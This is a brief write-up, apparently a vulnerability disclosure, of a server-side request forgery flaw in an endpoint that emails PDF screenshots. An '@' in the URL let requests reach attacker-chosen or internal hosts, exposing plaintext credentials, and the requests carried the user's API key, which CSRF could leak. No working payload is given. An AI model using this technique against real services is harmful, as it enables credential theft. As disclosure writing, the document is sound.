Server-Side Request Forgery with both server-side and client-sided impacts.

There was an API endpoint that would email a PDF to a user with a screenshot of a given location (intended to just be an endpoint on the particular application) but an @ could be used to break out and provide a custom domain and path for the request.

This allowed for the obvious server-side impact, reaching internal endpoints including a redash login page with the credentials auto-filled in visible plain text (including the password).

The client-side impact comes because the requests the server made to get a screenshot were authenticated as the current user. It would do this by adding a couple headers, one with the user’s API key and the other with their email that would authenticate the request as that user. So an attacker could leak a victims API key and email by tricking an victim into navigating to the vulnerable endpoint with a CSRF attack.